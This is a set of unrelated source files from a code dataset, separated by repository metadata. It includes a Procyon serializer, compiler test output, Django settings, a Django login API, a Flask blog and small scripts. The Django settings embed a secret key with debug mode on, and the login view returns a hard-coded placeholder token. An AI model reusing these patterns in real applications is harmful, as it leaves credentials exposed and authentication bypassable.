# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from __future__ import absolute_import, division, print_function, unicode_literals
import math
import re
import unicodedata
from . import error
from . import py3
from . import utf
from .types import Type, typeof
_NO_QUOTE_RE = re.compile("^[A-Za-z0-9._/+-]*$")
_UNPRINTABLE_RE = re.compile("[\\000-\\011\\013-\\037\\177]")
class DefaultStyle(object):
always_short = False
separators = (": ", ", ")
class ShortStyle(object):
always_short = True
separators = (": ", ", ")
class MinifiedStyle(object):
always_short = True
separators = (":", ",")
class ProcyonEncoder(object):
def __init__(self, style, converter):
self.always_short = style.always_short
self.colon, self.comma = style.separators
self.converter = _make_converter(converter)
def iterencode(self, obj):
markers = set()
if self.converter is not None:
obj = self.converter(obj)
if self._should_dump_short_value(obj):
result = self._dump_short_value(obj, markers)
else:
result = self._dump_long_value(obj, markers, "")
for chunk in result:
yield chunk
if not self.always_short:
yield "\n"
def encode(self, obj):
return "".join(self.iterencode(obj))
def _should_dump_short_value(self, x):
if self.always_short:
return True
return ProcyonEncoder._SHOULD_DUMP_SHORT_VALUE[typeof(x).value](x)
def _dump_short_value(self, x, markers):
return self._DUMP_SHORT_VALUE[typeof(x).value](self, x, markers)
def _dump_long_value(self, x, markers, indent):
return self._DUMP_LONG_VALUE[typeof(x).value](self, x, markers, indent)
def _dump_int(self, i):
if not (-0x8000000000000000 <= i < 0x8000000000000000):
raise OverflowError("Python int too large to convert to Procyon int")
return py3.unicode(i)
def _dump_float(self, f):
if math.isnan(f):
return "nan"
elif math.isinf(f):
if f > 0:
return "inf"
else:
return "-inf"
return py3.repr(f)
@staticmethod
def _should_dump_short_data(d):
return len(d) <= 4
def _dump_short_data(self, d):
yield "$"
for byte in bytearray(d):
yield "%02x" % byte
def _dump_long_data(self, d, indent):
for i, byte in enumerate(bytearray(d)):
if i == 0:
yield "$\t"
elif (i % 16) == 0:
yield "\n%s$\t" % indent
elif (i % 2) == 0:
yield " "
yield "%02x" % byte
@staticmethod
def _should_dump_short_string(s):
has_nl = False
if _UNPRINTABLE_RE.search(s):
return True
elif "\n" in s:
return False
return len(s) < 72
def _dump_short_string(self, s):
yield '"'
for cp in utf.code_points(s):
c = utf.unichr(cp)
if c in "\b\f\n\r\t\"\\":
yield {
"\b": "\\b",
"\f": "\\f",
"\n": "\\n",
"\r": "\\r",
"\t": "\\t",
"\"": "\\\"",
"\\": "\\\\",
}[c]
continue
category = unicodedata.category(c)
if category == "Cs":
raise ValueError("string %r contains surrogate code points" % s)
elif category in ("Cc", "Cf", "Co", "Cn"):
if cp < 0x10000:
yield "\\u%04x" % cp
else:
yield "\\U%08x" % cp
else:
yield c
yield '"'
@staticmethod
def _char_width(ch):
if " " <= ch < "\177":
return 1
category = unicodedata.category(ch)
if category.startswith("M"):
return 0
elif category.startswith("C"):
return 1
elif unicodedata.east_asian_width(ch) in "FW":
return 2
return 1
@staticmethod
def _str_width(s):
return sum(ProcyonEncoder._char_width(ch) for ch in s)
@staticmethod
def _wrap_lines(s):
line_start = 0
width = 0
prev_space = None
space = None
space_width = None
for i in py3.xrange(len(s)):
ch = s[i]
width += ProcyonEncoder._char_width(ch)
if ch == " ":
prev_space = space
space = i
space_width = width
if (space is not None) and (width > 72):
if space < (len(s) - 1):
yield s[line_start:space]
line_start = space + 1
width -= space_width
space = prev_space = None
continue
elif prev_space:
yield s[line_start:prev_space]
line_start = prev_space + 1
break
yield s[line_start:]
def _dump_long_string(self, s, indent):
paragraphs = s.split("\n")
trailing_newline = not paragraphs[-1]
if trailing_newline:
paragraphs.pop(-1)
prefix = ""
can_use_gt = True
for paragraph in paragraphs:
if prefix:
yield prefix
else:
prefix = "\n" + indent
if can_use_gt or not paragraph:
yield ">"
else:
yield "|"
if not paragraph:
can_use_gt = True
continue
can_use_gt = False
yield "\t"
line_prefix = ""
for line in ProcyonEncoder._wrap_lines(paragraph):
if line_prefix:
yield line_prefix
else:
line_prefix = "\n%s>\t" % indent
yield line
if not trailing_newline:
yield prefix + "!"
@staticmethod
def _should_dump_short_array(a):
for x in a:
if typeof(x).value <= Type.FLOAT.value:
continue
return False
return True
def _dump_short_array(self, a, markers):
if markers is not None:
id_a = id(a)
if id_a in markers:
raise ValueError("Circular reference detected")
markers.add(id_a)
yield "["
separator = ""
for x in a:
if separator:
yield separator
else:
separator = self.comma
for chunk in self._dump_short_value(x, markers):
yield chunk
yield "]"
if markers is not None:
markers.remove(id_a)
def _dump_long_array(self, a, markers, indent):
if markers is not None:
id_a = id(a)
if id_a in markers:
raise ValueError("Circular reference detected")
markers.add(id_a)
prefix = "*\t"
tail_prefix = "\n%s*\t" % indent
indent += "\t"
for i, x in enumerate(a):
yield prefix
prefix = tail_prefix
if self.converter is not None:
x = self.converter(x)
if self._should_dump_short_value(x):
for chunk in self._dump_short_value(x, markers):
yield chunk
else:
for chunk in self._dump_long_value(x, markers, indent):
yield chunk
if markers is not None:
markers.remove(id_a)
def _dump_key(self, k):
if _NO_QUOTE_RE.match(k):
return k
return "".join(self._dump_short_string(k))
@staticmethod
def _should_dump_short_map(m):
for x in py3.itervalues(m):
if typeof(x).value <= Type.FLOAT.value:
continue
return False
return True
def _dump_short_map(self, m, markers):
if markers is not None:
id_m = id(m)
if id_m in markers:
raise ValueError("Circular reference detected")
markers.add(id_m)
yield "{"
separator = ""
for k, v in py3.iteritems(m):
if not isinstance(k, py3.unicode):
raise TypeError("key %r is not a string" % k)
if separator:
yield separator
else:
separator = self.comma
yield self._dump_key(k)
yield self.colon
for chunk in self._dump_short_value(v, markers):
yield chunk
yield "}"
if markers is not None:
markers.remove(id_m)
def _dump_long_map(self, m, markers, indent):
if markers is not None:
id_m = id(m)
if id_m in markers:
raise ValueError("Circular reference detected")
markers.add(id_m)
prefix = ""
tail_prefix = "\n%s" % indent
indent += "\t"
adjusted = []
max_short_key_width = 0
for k, v in py3.iteritems(m):
if not isinstance(k, py3.unicode):
raise TypeError("key %r is not a string" % k)
k = self._dump_key(k)
if self.converter is not None:
v = self.converter(v)
short = self._should_dump_short_value(v)
if short:
width = ProcyonEncoder._str_width(k)
max_short_key_width = max(width, max_short_key_width)
adjusted.append((k, v, short, width))
else:
adjusted.append((k, v, short, 0))
for k, v, short, width in adjusted:
yield prefix
prefix = tail_prefix
if short:
yield k
yield ":"
yield " " * (max_short_key_width - width + 2)
for chunk in self._dump_short_value(v, markers):
yield chunk
else:
yield k
if k:
yield ":\n" + indent
else:
yield ":\t"
for chunk in self._dump_long_value(v, markers, indent):
yield chunk
if markers is not None:
markers.remove(id_m)
_SHOULD_DUMP_SHORT_VALUE = [
lambda x: True,
lambda x: True,
lambda x: True,
lambda x: True,
lambda x: ProcyonEncoder._should_dump_short_data(x),
lambda x: ProcyonEncoder._should_dump_short_string(x),
lambda x: ProcyonEncoder._should_dump_short_array(x),
lambda x: ProcyonEncoder._should_dump_short_map(x),
]
_DUMP_SHORT_VALUE = [
lambda self, x, markers: ["null"],
lambda self, x, markers: ["false", "true"][x],
lambda self, x, markers: [self._dump_int(x)],
lambda self, x, markers: [self._dump_float(x)],
lambda self, x, markers: self._dump_short_data(x),
lambda self, x, markers: self._dump_short_string(x),
lambda self, x, markers: self._dump_short_array(x, markers),
lambda self, x, markers: self._dump_short_map(x, markers),
]
_DUMP_LONG_VALUE = [
lambda self, x, markers, indent: ["null"],
lambda self, x, markers, indent: ["false", "true"][x],
lambda self, x, markers, indent: [self._dump_int(x)],
lambda self, x, markers, indent: [self._dump_float(x)],
lambda self, x, markers, indent: self._dump_long_data(x, indent),
lambda self, x, markers, indent: self._dump_long_string(x, indent),
lambda self, x, markers, indent: self._dump_long_array(x, markers, indent),
lambda self, x, markers, indent: self._dump_long_map(x, markers, indent),
]
def _make_converter(converter):
if converter is None:
return None
elif isinstance(converter, tuple):
if not all(callable(x) for x in converter):
raise TypeError("converter tuple elements must be callable")
def convert(x):
for convert_step in converter:
x = convert_step(x)
return x
return convert
elif callable(converter):
return converter
elif not isinstance(converter, dict):
raise TypeError("converter must be callable, tuple, or dict")
convert_none = converter.pop(None, None)
convert_bool = converter.pop(bool, None)
convert_int = converter.pop(int, None)
convert_float = converter.pop(float, None)
convert_data = converter.pop(bytes, None)
convert_string = converter.pop(py3.unicode, None)
convert_array = converter.pop(list, None)
convert_map = converter.pop(dict, None)
if not all(isinstance(k, (type, type(None))) for k in converter):
raise TypeError("converter dict keys must be type or None")
elif not all(isinstance(v, tuple) or callable(v) for v in py3.itervalues(converter)):
raise TypeError("converter dict values must be tuple or callable")
converter = {k: _make_converter(v) for k, v in py3.iteritems(converter)}
def convert(x):
if x is None:
return convert_none(x) if convert_none is not None else x
elif (x is True) or (x is False):
return convert_bool(x) if convert_bool is not None else x
elif isinstance(x, (int, py3.long)):
return convert_int(x) if convert_int is not None else x
elif isinstance(x, float):
return convert_float(x) if convert_float is not None else x
elif isinstance(x, (bytes, bytearray, memoryview)):
return convert_data(x) if convert_data is not None else x
elif isinstance(x, py3.unicode):
return convert_string(x) if convert_string is not None else x
elif isinstance(x, (list, tuple)):
return convert_array(x) if convert_array is not None else x
elif isinstance(x, dict):
return convert_map(x) if convert_map is not None else x
for t, convert_t in py3.iteritems(converter):
if isinstance(x, t):
return convert_t(x)
raise TypeError("%r is not Procyon-serializable" % x)
return convert
_DEFAULT_ARGS = (DefaultStyle, None)
_default_encoder = ProcyonEncoder(*_DEFAULT_ARGS)
def _get_encoder(style, converter):
if (style, converter) == _DEFAULT_ARGS:
return _default_encoder
return ProcyonEncoder(style, converter)
def dump(obj, fp, style=DefaultStyle, converter=None):
encoder = _get_encoder(style, converter)
for chunk in encoder.iterencode(obj):
fp.write(chunk)
def dumps(obj, style=DefaultStyle, converter=None):
encoder = _get_encoder(style, converter)
return encoder.encode(obj)
def main(args=None):
import sys
from .decode import load
if args is None:
args = sys.argv
if len(args) != 1:
sys.stderr.write("usage: python -m procyon.dump\n")
return 64
try:
x = load(sys.stdin)
except Exception as e:
sys.stderr.write("%s: %s\n" % (args[0], e))
return 1
dump(x, sys.stdout)
__all__ = ["dump", "dumps"]
if __name__ == "__main__":
import sys
sys.exit(main())
|
[
"[email protected]"
] | |
f6b95860f10c9325ec94d3af1b593bc00be03155
|
96f76dc8e634c4e9324168c163f098ec27d431a0
|
/decaf_PA3/TestCases/S3/output/q5-array-test3.tac
|
a7b3524e0745bb28deb5fc97d16819cbac615eca
|
[
"MIT"
] |
permissive
|
joker452/Decaf-compiler
|
8e452a8d1f2a4584df7cdf3feb694e87f6333afb
|
4f81dbd3d049245af8a8cb7234db7792ca57e61a
|
refs/heads/master
| 2020-08-05T11:24:19.679494 | 2019-10-03T02:23:52 | 2019-10-03T02:23:52 | 212,482,043 | 2 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 1,860 |
tac
|
VTABLE(_Father) {
<empty>
Father
_Father.foo;
}
VTABLE(_Child) {
_Father
Child
_Father.foo;
}
VTABLE(_Main) {
<empty>
Main
}
FUNCTION(_Father_New) {
memo ''
_Father_New:
_T1 = 8
parm _T1
_T2 = call _Alloc
_T3 = 0
*(_T2 + 4) = _T3
_T4 = VTBL <_Father>
*(_T2 + 0) = _T4
return _T2
}
FUNCTION(_Child_New) {
memo ''
_Child_New:
_T5 = 12
parm _T5
_T6 = call _Alloc
_T7 = 0
*(_T6 + 4) = _T7
*(_T6 + 8) = _T7
_T8 = VTBL <_Child>
*(_T6 + 0) = _T8
return _T6
}
FUNCTION(_Main_New) {
memo ''
_Main_New:
_T9 = 4
parm _T9
_T10 = call _Alloc
_T11 = VTBL <_Main>
*(_T10 + 0) = _T11
return _T10
}
FUNCTION(_Father.foo) {
memo '_T0:4'
_Father.foo:
_T12 = *(_T0 + 4)
return _T12
}
FUNCTION(main) {
memo ''
main:
_T15 = 3
_T14 = _T15
_T16 = 10
_T17 = 0
_T18 = (_T16 < _T17)
if (_T18 == 0) branch _L13
_T19 = "Decaf runtime error: The length of the created array should not be less than 0.\n"
parm _T19
call _PrintString
call _Halt
_L13:
_T20 = 4
_T21 = (_T20 * _T16)
_T22 = (_T20 + _T21)
parm _T22
_T23 = call _Alloc
*(_T23 + 0) = _T16
_T23 = (_T23 + _T22)
_L14:
_T22 = (_T22 - _T20)
if (_T22 == 0) branch _L15
_T23 = (_T23 - _T20)
*(_T23 + 0) = _T14
branch _L14
_L15:
_T13 = _T23
_T24 = *(_T13 - 4)
_T26 = 4
_T27 = (_T26 * _T24)
_T28 = 0
_L17:
_T29 = (_T13 + _T28)
_T25 = *(_T29 + 0)
_T28 = (_T28 + _T26)
_T30 = 2
_T31 = (_T14 > _T30)
if (_T31 == 0) branch _L16
_T32 = (_T14 + _T25)
_T14 = _T32
parm _T25
call _PrintInt
parm _T14
call _PrintInt
_T33 = "\n"
parm _T33
call _PrintString
_T34 = (_T28 < _T27)
if (_T34 == 0) branch _L16
branch _L17
_L16:
}
|
[
"[email protected]"
] | |
f7541475b3be841d31e189cb3c9fdf1758902cb0
|
899535934b21c2afbbf00d85ee73e05df5dff876
|
/wisdompets/settings.py
|
70aff8427aa16971b8c237438a4f390456492da2
|
[] |
no_license
|
YousefKJM/Wisdompets-Django-Web-App
|
b29c71978ce85f1342e9d01b878b105e3bc5d5ed
|
aca3484256a1a77acf26e10da2358fd28006aa6a
|
refs/heads/master
| 2021-02-27T14:27:03.493629 | 2020-04-13T20:48:43 | 2020-04-13T20:48:43 | 245,612,348 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 3,198 |
py
|
"""
Django settings for wisdompets project.
Generated by 'django-admin startproject' using Django 3.0.4.
For more information on this file, see
https://docs.djangoproject.com/en/3.0/topics/settings/
For the full list of settings and their values, see
https://docs.djangoproject.com/en/3.0/ref/settings/
"""
import os
# Build paths inside the project like this: os.path.join(BASE_DIR, ...)
BASE_DIR = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))
# Quick-start development settings - unsuitable for production
# See https://docs.djangoproject.com/en/3.0/howto/deployment/checklist/
# SECURITY WARNING: keep the secret key used in production secret!
SECRET_KEY = 'eloi+4w8f!@&x9d+q5%#6g1(a3_b(q3$z76(a=(yj*+q^g++!8'
# SECURITY WARNING: don't run with debug turned on in production!
DEBUG = True
ALLOWED_HOSTS = []
# Application definition
INSTALLED_APPS = [
'adoptions.apps.AdoptionsConfig',
'django.contrib.admin',
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.messages',
'django.contrib.staticfiles',
]
MIDDLEWARE = [
'django.middleware.security.SecurityMiddleware',
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.common.CommonMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
'django.middleware.clickjacking.XFrameOptionsMiddleware',
]
ROOT_URLCONF = 'wisdompets.urls'
TEMPLATES = [
{
'BACKEND': 'django.template.backends.django.DjangoTemplates',
'DIRS': [],
'APP_DIRS': True,
'OPTIONS': {
'context_processors': [
'django.template.context_processors.debug',
'django.template.context_processors.request',
'django.contrib.auth.context_processors.auth',
'django.contrib.messages.context_processors.messages',
],
},
},
]
WSGI_APPLICATION = 'wisdompets.wsgi.application'
# Database
# https://docs.djangoproject.com/en/3.0/ref/settings/#databases
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.sqlite3',
'NAME': os.path.join(BASE_DIR, 'db.sqlite3'),
}
}
# Password validation
# https://docs.djangoproject.com/en/3.0/ref/settings/#auth-password-validators
AUTH_PASSWORD_VALIDATORS = [
{
'NAME': 'django.contrib.auth.password_validation.UserAttributeSimilarityValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.MinimumLengthValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.CommonPasswordValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.NumericPasswordValidator',
},
]
# Internationalization
# https://docs.djangoproject.com/en/3.0/topics/i18n/
LANGUAGE_CODE = 'en-us'
TIME_ZONE = 'UTC'
USE_I18N = True
USE_L10N = True
USE_TZ = True
# Static files (CSS, JavaScript, Images)
# https://docs.djangoproject.com/en/3.0/howto/static-files/
STATIC_URL = '/static/'
STATICFILES_DIRS = [
os.path.join(BASE_DIR, 'static')
]
|
[
"[email protected]"
] | |
4548ef21e9b08582379456e8ad9027209ec11034
|
b816b149247b395e2df5c32fe0c33557f5bc4224
|
/Unified SL-RL/joyStickExamples/Joy_Test.py
|
70ec418d7146a14aa8e85a0f5ab7bab67983d369
|
[] |
no_license
|
NiklasMelton/research_code
|
490683d979159fb77b540e016200d09912c4e1e6
|
9bc3bfc5dfd7c7b1741d91d31f940c19aff6a677
|
refs/heads/master
| 2021-01-09T20:41:09.010564 | 2016-07-01T22:07:27 | 2016-07-01T22:07:27 | 62,421,676 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 827 |
py
|
#joyTest
import pygame, sys
pygame.init()
size = width, height = 1000, 600
screen = pygame.display.set_mode(size)
font = pygame.font.SysFont("Comic Sans MS", 12)
pos = [int(width/2),int(height/2)]
joystick_count = pygame.joystick.get_count()
my_joystick = pygame.joystick.Joystick(0)
my_joystick.init()
while True:
screen.fill((255,255,255))
pygame.draw.circle(screen,(255,0,0), (pos), 50)
for event in pygame.event.get():
if event.type == pygame.QUIT:
pygame.quit()
sys.exit()
h_axis = my_joystick.get_axis(0)
button = []
for b in range(0,8):
button.append([my_joystick.get_button(b),b])
print(button)
#if h_axis < 0: h_axis = 0
#if h_axis > maxAxis: h_axis = maxAxis
n_steer = h_axis
pos[0] += int(n_steer*10)
pygame.display.update()
|
[
"niklas melton"
] |
niklas melton
|
dca5f0f92983189cae3d3cb56061ba96de3d20d2
|
bc0c70345e42332d0d79a552f0ea2702c5080914
|
/recommendation/api.py
|
666a6fccfad42d99f2c0039210b394bb8a53469d
|
[] |
no_license
|
rozig/nutrition-calculator
|
603b5609b17e562b7bd351e79f85c0f485f0fe45
|
45a36c21150899723b1adad767454a40827a1616
|
refs/heads/master
| 2021-03-22T04:32:12.139535 | 2017-01-04T02:00:21 | 2017-01-04T02:00:21 | null | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 1,753 |
py
|
# -*- coding: utf-8 -*-
from django.shortcuts import render, redirect, render_to_response
from django.contrib.auth.decorators import login_required
from django.contrib.auth import authenticate, login
from django.http import HttpResponse
from django.http import JsonResponse
from datetime import date
from .models import User, Food, Machine_Data, Food_Nutrition
def login_api(request):
error = ""
username = password = ""
if request.POST:
body_unicode = request.body.decode("UTF-8")
body = json.loads(body_unicode)
username = body["username"]
password = body["password"]
print username
# if !username || !password:
# response = JsonResponse({
# "code": 400,
# "message": u"Хандалтын параметр дутуу байна!"
# })
# return response
user = authenticate(username=username, password=password)
if user is not None:
if user.is_active:
login(request, user)
response = JsonResponse({
"code": 200,
"message": u"Амжилттай нэвтэрлээ",
"token": "dqqwdqdsad"
})
return response
else:
response = JsonResponse({
"code": 403,
"message": u"Хэрэглэгч идэвхигүй байна!"
})
return response
else:
response = JsonResponse({
"code": 403,
"message": u"Хэрэглэгчийн нэр эсвэл нууц үг буруу байна!"
})
return response
|
[
"[email protected]"
] | |
5268cff948f9c48f0fd6138032a6afd729243dd6
|
2a6412a9359a1df5f8f12e319e73b9e4e46fd64c
|
/specializedSubjects/AlgorithmII/dijkstra_ON2.py
|
f7130f780bcfbbcb7e2864c816bf76de51c44942
|
[] |
no_license
|
danganhvu1998/myINIAD
|
504d1147a02f12e593f30e369daf82f85aa01bfd
|
01547673dd3065efb6c7cc8db77ec93a5a4f5d98
|
refs/heads/master
| 2022-03-17T12:58:34.647229 | 2022-02-08T06:34:19 | 2022-02-08T06:34:19 | 143,675,719 | 1 | 4 | null | null | null | null |
UTF-8
|
Python
| false | false | 770 |
py
|
import networkx as nx
import matplotlib.pyplot as plt
def get_min(D, X):
arg_min= -1
min_value= float('inf')
for i in range(len(D)):
if D[i] < min_value:
if i in X:
arg_min= i
min_value= D[i]
return arg_min
def dijkstra(src, G):
D= [float('inf')] * nx.number_of_nodes(G)
D[src]= 0.0
X= set(G.nodes)
while X:
u= get_min(D, X)
X.remove(u)
neighbors= G.neighbors(u)
for v in neighbors:
if v in X:
if (D[u] + G.edges[u, v]['weight'] < D[v]):
D[v]= D[u] + G.edges[u, v]['weight']
return D
G= nx.read_weighted_edgelist('dij.edgelist', nodetype=int)
print(dijkstra(0, G))
nx.draw_networkx(G)
plt.show()
|
[
"[email protected]"
] | |
1d90eb564286440c993c0ed57142493085ad53ca
|
a33264b19fb5cf9388916713baebfeed635ed26a
|
/main.py
|
c7c4f1eb38ccd31b5b87c4f0728e4a1410a4d955
|
[] |
no_license
|
LiangYuHai/DSTC-7
|
628713ac2cfe6ef7ae51dddad659b49941b1fba3
|
7d00eaed68b29d8673ab964609f82949f2972687
|
refs/heads/master
| 2020-09-11T01:27:45.246477 | 2020-01-06T05:50:49 | 2020-01-06T05:50:49 | 221,894,671 | 0 | 1 | null | null | null | null |
UTF-8
|
Python
| false | false | 3,978 |
py
|
import os
import tensorflow as tf
from Model import Model
import pickle
import numpy as np
import sys
from sklearn.metrics import classification_report
import logging
logger = logging.getLogger(__name__)
logger.setLevel(level=logging.INFO)
handler = logging.FileHandler("log.txt")
handler.setLevel(logging.INFO)
formatter = logging.Formatter('%(asctime)s - %(name)s - %(levelname)s - %(message)s')
handler.setFormatter(formatter)
logger.addHandler(handler)
with open('./data/train_dev_data.pkl', 'rb') as f:
train_context = pickle.load(f)
train_next = pickle.load(f)
train_labels = pickle.load(f)
train_context_masks = pickle.load(f)
train_next_masks = pickle.load(f)
dev_context = pickle.load(f)
dev_next = pickle.load(f)
dev_labels = pickle.load(f)
dev_context_masks = pickle.load(f)
dev_next_masks = pickle.load(f)
vocabs_size = pickle.load(f)
vocabs_dict = pickle.load(f)
index_dict = pickle.load(f)
emb = pickle.load(f)
train_context_lengths = pickle.load(f)
train_next_lengths = pickle.load(f)
dev_context_lengths = pickle.load(f)
dev_next_lengths = pickle.load(f)
if len(sys.argv) == 2 and sys.argv[1] == 'train':
model = Model(vocabs_size, emb)
model.build_graph()
sess = tf.Session()
sess.run(tf.global_variables_initializer())
saver = tf.train.Saver(max_to_keep=1)
max_acc = 0
for e in range(50):
try:
sess.run(model.batched_iter.initializer,
feed_dict={model.context_string: train_context, model.next_tring: train_next,
model.labels: train_labels, model.context_string_lengths: train_context_lengths,
model.next_tring_lengths: train_next_lengths, model.context_masks:train_context_masks,
model.next_masks:train_next_masks})
while True:
step_, _, x_mask, cl_, acc_, _ = sess.run(
[model.global_step, model.get_next, model.c, model.cl, model.acc, model.train_op])
if step_ % 50 == 0:
print('training step:{} | loss:{:.3f} | acc:{:.2f}%'.format(step_, cl_, acc_))
print(x_mask)
logger.info(('training step:{} | loss:{:.3f} | acc:{:.2f}%'.format(step_, cl_, acc_)))
except:
print('Training Epoch {} Done!'.format(e))
logger.info('Training Epoch {} Done!'.format(e))
if e % 2 == 0:
true_labels = []
pred_labels = []
try:
sess.run(model.batched_iter.initializer,
feed_dict={model.context_string: dev_context, model.next_tring: dev_next,
model.labels: dev_labels, model.context_string_lengths: dev_context_lengths,
model.next_tring_lengths: dev_next_lengths, model.context_masks:dev_context_masks,
model.next_masks:dev_next_masks})
while True:
step_, data_, cl_, pred_, acc_= sess.run(
[model.global_step, model.get_next, model.cl, model.pred, model.acc])
true_labels.extend(data_[2])
pred_labels.extend(pred_)
if step_ % 10 == 0:
print('Validating step:{} | loss:{:.3f} | acc:{:.2f}%'.format(step_, cl_, acc_))
logger.info('Validating step:{} | loss:{:.3f} | acc:{:.2f}%'.format(step_, cl_, acc_))
if acc_ > max_acc:
max_acc = acc_
saver.save(sess, save_path='./result/', global_step=step_)
except:
print('Validating Done')
print(classification_report(true_labels, pred_labels))
logger.info('Validating Done')
logger.info(classification_report(true_labels, pred_labels))
|
[
"[email protected]"
] | |
6654106ee8d717fd2879ea22d95e5b2fa3248d24
|
64490a017504e76b12e22024a40ec782ea6b00a4
|
/application/Movie.py
|
a8070db80185cc9fc38b44c9e0453e2724416cb3
|
[] |
no_license
|
mihaitopan/MovieRecommenderSystem
|
b0ee9400dfeecc2669bfb1ba4def7b9cc113533a
|
8377ebcf5a40b4f6195e3dc94828e4e4a36d3c0b
|
refs/heads/master
| 2020-03-20T04:42:52.479942 | 2018-06-24T18:59:55 | 2018-06-24T18:59:55 | 137,192,398 | 0 | 1 | null | 2018-06-24T18:59:55 | 2018-06-13T09:18:57 | null |
UTF-8
|
Python
| false | false | 365 |
py
|
class Movie:
def __init__(self, movieId, title, genres):
self._movieId = movieId
self._title = title
self._genres = genres
def getMovieId(self):
return self._movieId
def getTitle(self):
return self._title
def getGenres(self):
return self._genres
def __str__(self):
return self._title
|
[
"[email protected]"
] | |
8ae9d30226f0b7472a646d8cbb5938c465c681c6
|
cdc8c21405aec6c823c43ea65239bb0e860a6b6f
|
/setup.py
|
687a65aa8c3b54281b88b2444c4b79f9281be427
|
[
"Apache-2.0"
] |
permissive
|
antonini/TRX
|
ae8b4f4b77f702ccdb3571632ba3f27a5769628b
|
a66ed83f95e3597c89a02193179913e983065ff2
|
refs/heads/master
| 2021-01-12T12:50:14.468959 | 2016-09-22T19:26:46 | 2016-09-22T19:26:46 | null | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 475 |
py
|
try:
from setuptools import setup
except ImportError:
from distutils.core import setup
config = {
'description': 'TRX',
'author': 'Kyle Maxwell, based on Paterva\'s library',
'url': 'https://github.com/krmaxwell/TRX',
'download_url': 'https://github.com/krmaxwell/TRX',
'author_email': '[email protected]',
'version': '0.1',
'install_requires': ['nose'],
'packages': ['TRX'],
'scripts': [],
'name': 'TRX'
}
setup(**config)
|
[
"[email protected]"
] | |
b82ca425bb35c94f7141a7d5fb59cbea3e9c59b2
|
3194b35e8a93cf708f262dcf1cb070da330fc6a7
|
/flaskr/blog.py
|
3223c14b48527aefb0b290f5850897e4ee20bd8b
|
[] |
no_license
|
monkeysh1ne/flask-tutorial
|
2235014068a4bf9dd3fdd4119883ade2d0578fd0
|
06a5145714f93a3540e98f0d9daa26b4afd73d1e
|
refs/heads/master
| 2020-09-07T07:28:23.106552 | 2019-11-15T05:56:01 | 2019-11-15T05:56:01 | 220,682,389 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 2,608 |
py
|
from flask import (
Blueprint, flash, g, redirect, render_template, request, url_for
)
from werkzeug.exceptions import abort
from flaskr.auth import login_required
from flaskr.db import get_db
bp = Blueprint('blog', __name__)
@bp.route('/')
def index():
db = get_db()
posts = db.execute(
'SELECT p.id, title, body, created, author_id, username'
' FROM post p JOIN user u ON p.author_id = u.id'
' ORDER BY created DESC'
).fetchall()
return render_template('blog/index.html', posts=posts)
@bp.route('/create', methods=('GET', 'POST'))
@login_required
def create():
if request.method == 'POST':
title = request.form['title']
body = request.form['body']
error = None
if not title:
error = 'Title is required.'
if error is not None:
flash(error)
else:
db = get_db()
db.execute(
'INSERT INTO post (title, body, author_id)'
' VALUES (?, ?, ?)',
(title, body, g.user['id'])
)
db.commit()
return redirect(url_for('blog.index'))
return render_template('blog/create.html')
def get_post(id, check_author=True):
post = get_db().execute(
'SELECT p.id, title, body, created, author_id, username'
' FROM post p JOIN user u ON p.author_id = u.id'
' WHERE p.id = ?',
(id,)
).fetchone()
if post is None:
abort(404, "Post id {0} doesn't exist.".format(id))
if check_author and post['author_id'] != g.user['id']:
abort(403)
return post
@bp.route('/<int:id>/update', methods=('GET', 'POST'))
@login_required
def update(id):
post = get_post(id)
if request.method == 'POST':
title = request.form['title']
body = request.form['body']
error = None
if not title:
error = 'Title is required.'
if error is not None:
flash(error)
else:
db = get_db()
db.execute(
'UPDATE post SET title = ?, body = ?'
' WHERE id = ?',
(title, body, id)
)
db.commit()
return redirect(url_for('blog.index'))
return render_template('blog/update.html', post=post)
@bp.route('/<int:id>/delete', methods=('POST',))
@login_required
def delete(id):
get_post(id)
db = get_db()
db.execute('DELETE FROM post where id = ?', (id,))
db.commit()
return redirect(url_for('blog.index'))
|
[
"[email protected]"
] | |
a645386e0c34474857014299151a5d45a2ce0535
|
b8115bc7503581bf3bb44bfa87b270793aff4381
|
/ddsp/training/data_preparation/ddsp_prepare_tfrecord.py
|
f7a4c0f3576f5ff085e50c33af5f4a887ed246f2
|
[
"Apache-2.0"
] |
permissive
|
pollinations/ddsp
|
7a5cfd18efcd8a77729d26231d294a4c03c2d286
|
4bbb3b1b0aa9e9a4c1f77e8758f409cbd1ec03f7
|
refs/heads/main
| 2023-06-21T18:21:37.230721 | 2021-07-22T09:45:54 | 2021-07-22T09:45:54 | 388,399,770 | 0 | 0 |
Apache-2.0
| 2021-07-22T09:14:11 | 2021-07-22T09:14:10 | null |
UTF-8
|
Python
| false | false | 3,340 |
py
|
# Copyright 2021 The DDSP Authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# Lint as: python3
r"""Create a TFRecord dataset from audio files.
Usage:
====================
ddsp_prepare_tfrecord \
